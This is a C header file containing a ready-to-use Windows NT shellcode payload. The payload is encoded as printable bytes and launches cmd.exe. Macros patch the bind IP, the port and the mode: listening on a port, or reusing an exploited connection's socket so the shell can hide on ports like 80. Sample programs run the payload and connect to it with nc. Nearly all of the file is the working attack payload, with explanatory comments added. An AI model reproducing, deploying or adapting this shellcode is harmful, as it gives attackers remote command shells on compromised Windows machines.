/*****************************************************************************
. Designed for any version of the NT platform
. Can reuse port, such as 80
. Can reuse a connection: the shellcode searches for the valid connection by peer IP and peer port
. Can auto-bind the local address when reusing a port
. Resumes work when the client reconnects after a disconnect
. Use "exit" to quit
******************************************************************************/
/*****************************************************************************
test program for connection reuse
------------------------------------------------------------------------------
#include ".h"
main()
{
ShellcodeSetRunType(ShellcodeRunReuseSock);
ShellcodeBindIP(inet_addr("192.168.0.5"));
ShellcodeBindPort(99);
((void (*)(void)) &shellcode)();
}
nc -p 99 192.168.0.1 80
******************************************************************************
test program for port binding
------------------------------------------------------------------------------
#include ".h"
main()
{
ShellcodeSetRunType(ShellcodeRunListenPort);
ShellcodeBindIP(0x0UL);
ShellcodeBindPort(99);
((void (*)(void)) &shellcode)();
}
nc 192.168.0.1 99
******************************************************************************/
#ifndef WINSHELLCODE_H
#define WINSHELLCODE_H
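#define CODEBYTE 0x61
/* Offsets into shellcode[] of the fields the macros below patch at run time.
 * Each field is stored as printable characters, two per byte (see
 * ShellcodePatchByte): run type 2 chars, IP 8 chars, port 4 chars. */
#define ShellCodeRunTypeOfs 0xe00
#define ShellCodePortOfs 0xe0a
#define ShellCodeIPOfs 0xe02
/* Values accepted by ShellcodeSetRunType. */
#define ShellcodeRunListenPort 0
#define ShellcodeRunReuseSock 1
/* Value for ShellcodeBindIP that, per the header comment, selects automatic
 * binding of the local address. */
#define ShellcodeAutoBindIP 0x0ffffffffUL

/* Store the low byte of (b) at shellcode[ofs] and shellcode[ofs + 1] as two
 * characters: CODEBYTE + low nibble, then CODEBYTE + high nibble. (b) is
 * evaluated twice, so the public macros below hand it a local copy. */
#define ShellcodePatchByte(ofs, b) \
	do { \
		shellcode[(ofs)] = (unsigned char)(CODEBYTE + (((b) & 0xff) % 0x10)); \
		shellcode[(ofs) + 1] = (unsigned char)(CODEBYTE + (((b) & 0xff) / 0x10)); \
	} while (0)

/* Select the run mode: ShellcodeRunListenPort or ShellcodeRunReuseSock.
 * Only the low byte of (x) is stored. Each public macro expands to a single
 * statement (do/while(0)), so it is used with a trailing semicolon like a
 * function call and is safe inside an unbraced if/else. */
#define ShellcodeSetRunType(x) \
	do { \
		unsigned long sc_val_ = (unsigned long)(x); \
		ShellcodePatchByte(ShellCodeRunTypeOfs, sc_val_); \
	} while (0)

/* Store the 16-bit port (x): high byte at ShellCodePortOfs, low byte at
 * ShellCodePortOfs + 2. The argument is parenthesized and evaluated exactly
 * once; the previous `x >> 8` form applied the shift to only part of an
 * unparenthesized argument such as `base | 3`, and evaluated it four times. */
#define ShellcodeBindPort(x) \
	do { \
		unsigned long sc_val_ = (unsigned long)(x); \
		ShellcodePatchByte(ShellCodePortOfs, sc_val_ >> 8); \
		ShellcodePatchByte(ShellCodePortOfs + 2, sc_val_); \
	} while (0)

/* Store the 32-bit address (x) byte by byte, least significant byte at
 * ShellCodeIPOfs up to the most significant at ShellCodeIPOfs + 6. Pass the
 * value in the layout inet_addr() returns (as the sample programs do), or
 * ShellcodeAutoBindIP. Evaluates (x) exactly once. */
#define ShellcodeBindIP(x) \
	do { \
		unsigned long sc_val_ = (unsigned long)(x); \
		ShellcodePatchByte(ShellCodeIPOfs, sc_val_); \
		ShellcodePatchByte(ShellCodeIPOfs + 2, sc_val_ >> 8); \
		ShellcodePatchByte(ShellCodeIPOfs + 4, sc_val_ >> 16); \
		ShellcodePatchByte(ShellCodeIPOfs + 6, sc_val_ >> 24); \
	} while (0)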
/*
 * Payload buffer. It is initialized from a string literal, so the array
 * carries an implicit trailing '\0' and sizeof shellcode is one more than the
 * number of bytes written below.
 * Layout as visible in the literal: a short prefix of raw "\x.." bytes, then
 * a long run that appears to use only the characters 'a'..'p' (CODEBYTE 0x61
 * plus a nibble — the same encoding the ShellcodeSetRunType/ShellcodeBind*
 * macros write), and finally the literal "cmd.exe$".
 * The patch offsets ShellCodeRunTypeOfs (0xe00), ShellCodeIPOfs (0xe02) and
 * ShellCodePortOfs (0xe0a) index into this array. By a byte count of the
 * literal as shown (60 hex-escaped bytes, 55 lines of 64 characters, then the
 * last short line), they fall in the 'a'-padded tail of the last encoded
 * line, where the defaults decode to run type 0 (ShellcodeRunListenPort),
 * IP 0 and port 99 ("dg" -> 0x63) — consistent with the sample programs in
 * the header comment. Verify the count if the literal is ever edited.
 * NOTE(review): the array is deliberately non-const because the macros write
 * into it at run time; nothing here range-checks the offsets against
 * sizeof shellcode, so the offsets and the literal must be kept in step.
 */
unsigned char shellcode[]=
"\x90\xeb\x05\x90\x5f\x90\xeb\x05\xe8\xf7\xff\xff\xff\x8d\x6f\x2f"
"\x90\x90\x90\x90\x8b\xf5\x8b\xfd\x33\xc9\xb1\xe9\x90\xb5\x06\xfc"
"\x66\xad\x90\x2c\x61\x80\xec\x61\xc0\xe4\x04\x02\xc4\xaa\xe2\xf0"
"\xac\xaa\x3c\x24\x75\xfa\x90\x32\xc0\x88\x47\xff"
"ioijeaaaaaiokbfaaaaaiodgcaaaaajifioifaaaaaioggcaaaaaiognbaaaaaji"
"fikjfaaaaaainlcogaaaaabaehpaajajajajiohkdaaaaajificjfaaaaalificj"
"faaaaaiohicaaaaajifigjfaaaaaioofaaaaaaiobjaaaaaadiipaaehaolifigj"
"faaaaaafppfjifgaaaaalificjfaaaaaafppfjifgaaaaalifikhfaaaaaafppfj"
"bnfaaaaalifigifaaaaaafppfjbnfaaaaailaaaaaaaaaflifikjfaaaaaafppfj"
"abgaaaaailaaaaaaaaafppfjbcgaaaaadmlifigjfaaaaakgaakgjbnifianaaaa"
"aaaflifigjfaaaaaafppfjoegaaaaadmnakaigehehahkdpcpchhhhhhocdhfhog"
"ihocpgchhgnakanakaigajaaaaaappfjkagaaaaalifikhfaaaaaiogmaaaaaadi"
"ippppaeiglaaaaaadiipaaehhfajajajajkgaanifikifaaaaaafigaaeaaaaali"
"fioifaaaaaaflifikhfaaaaaafppfjbagaaaaadiipaapaeiciaaaaaakgaalifi"
"kifaaaaaaflifioifaaaaaaflifigjfaaaaaafppfjoegaaaaadiipppehegajaj"
"ajajlofikgaaigaaeaaaaalifioifaaaaaaflifigjfaaaaaafppfjdfgaaaaadi"
"ipaaehodajajajajdiipppehfdajajajajddlndfninjkifaaaaadfaflifioifa"
"aaaaaflifigifaaaaaafppfjhpfaaaaadiipaaehjaajajajajjolcppppppddam"
"iedmddamdmddlndfninjbpbaaaaadfddlndfdfdfafppfjnnfaaaaadiipaaehla"
"ajajajajlifibpbaaaaadmilppppppppdmaaaaaaaalifioifaaaaahmaaeeaaaa"
"aaafppfjclfaaaaalinjoifaaaaalifiohfaaaaajideaejidemdlificifaaaaa"
"jideidilbabaaaaajidemcggilaaaaggjideaddfdfddamafafafaeafieafafni"
"fijogaaaaaafddamafppfjcmfaaaaalifiohfaaaaaafppfjbnfaaaaalificifa"
"aaaaafppfjbnfaaaaalifioifaaaaaliaadmigaaeaaaaakgaeppfjlofaaaaadm"
"ddamafnifidmcaaaaahmaamaaaaaaaafnifiohfaaaaaafnifikhfaaaaaafppfj"
"hkfaaaaaddamafnifidmcaaaaaafnifigifaaaaaafnificifaaaaaafppfjhkfa"
"aaaadmaaaaaaaaaaaaaaaabaaaaaaaainlcogaaaaaaaehdhajajajajkgacppfj"
"kagaaaaakgaaifaendaaaabaaaphaoafninjmhdaaaaahmdaabaaaaaadfninjcn"
"gaaaaadfafppfjakgaaaaadiipaafhgnlinjgngaaaaaldnjdogaaaaafhimggli"
"njengaaaaaggldnjhogaaaaafhilifafninjmhdaaaaahmdaaaaaaaaadfigohgg"
"eaaiafppfjejgaaaaaifdmafkgacppfjkagaaaaaifafninjmhdaaaaahmdaabaa"
"aaaadfninjcngaaaaadfafppfjhegaaaaadiipaaliinifmhcnlidmdmaaaaaaaa"
"kgdbnifikmdaaaaaafppfjpggaaaaanifikmdaaaaaafppfjlhgaaaaadiipaaeh"
"ccajajajajliahmaliopmpnkdiipaaehdbajajajajliaamdkaehapmdamehmomd"
"mkehiodmlihpnkliaadmaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalifi"
"oifaaaaaafkgcappfjeggaaaaakgaakgbakgcappfjedgaaaaadiippppaeiijaa"
"aaaajificjfaaaaaninjkifaaaaahmdabaaaaaaakgeadfkgeaigppppaaaaafpp"
"fjjigaaaaadiipaafhahajajajajgglifihogaaaaaggjifiengaaaaalifidoga"
"aaaajifigngaaaaadiipppfhpaajajajajiokcppppppjifigngaaaaalificjfa"
"aaaakgabninjcngaaaaadfafppfjldgaaaaadiipaafhdcajajajajkgfalificj"
"faaaaaafppfjaegaaaaadiipaafhlaajajajajlificjfaaaaadmddamdmilaaaa"
"bphhbiidnekfajaaehhaajajajajielobpliinlidhmddadplighihdadpliohac"
"dalplioeebddcngfhfbflipddalpniflllgaaaaaddjmblhadpgghkehmaajajaj"
"ajjfpfdihmeacecopnjfpfoflikmligeecdadmbnbodabmddjmggliialigembda"
"dmbmbocadabmliaadadmjifiomgaaaaalidmninjokgaaaaaioafaaaaaajifikm"
"gaaaaadmninlojfaaaaalihmhfiopcaaaaaapfafcdamddjmhpbnmpcpokifaipd"
"aaehhbajajajajafhflipnionbaaaaaapfjihaifhehehehelojnheaipdaafhkm"
"dmdfninjkmgaaaaaafppdblfdmhfninlomgaaaaadfafpphbpfdmaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalefe"
"cfoefemeddcdaadechfgbgehfgafjgahfgaahefgehdfehbgchehfhahjeogggpg"
"beaadechfgbgehfgafchpgdgfgdhdhbeaademgpgdhfgiebgogegmgfgaaaffgfg"
"lgoebgngfgegafjgahfgaahemgpgcgbgmgbemgmgpgdgaahfchjgehfggejgmgfg"
"aacffgbgeggejgmgfgaadfmgfgfgahaaeffgchngjgogbgehfgafchpgdgfgdhdh"
"aafeihjgehefigchfgbgegaaaahfdfcdpfddcdaadhpgdglgfgehaacgjgogegaa"
"mgjgdhehfgogaabgdgdgfgahehaadhfgogegaachfgdgghaadgmgpgdhfgdhpgdg"
"lgfgehaahfdfbedfehbgchehfhahaahgfgehigpgdhehogbgngfgaahgfgehigpg"
"dhehcgjhogbgngfgaadhfgehdhpgdglgpgahehaajgpgdgehmgdhpgdglgfgehaa"
"hgfgehahfgfgchogbgngfgaaaaaamepgbgegmejgcgchbgchjhbeaahefgehafch"
"pgdgbeegegchfgdhdhaaaaaaaaaaaaaaaaaacaaaaadgaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaadg"
"cmd.exe$";
#endif //WINSHELLCODE_H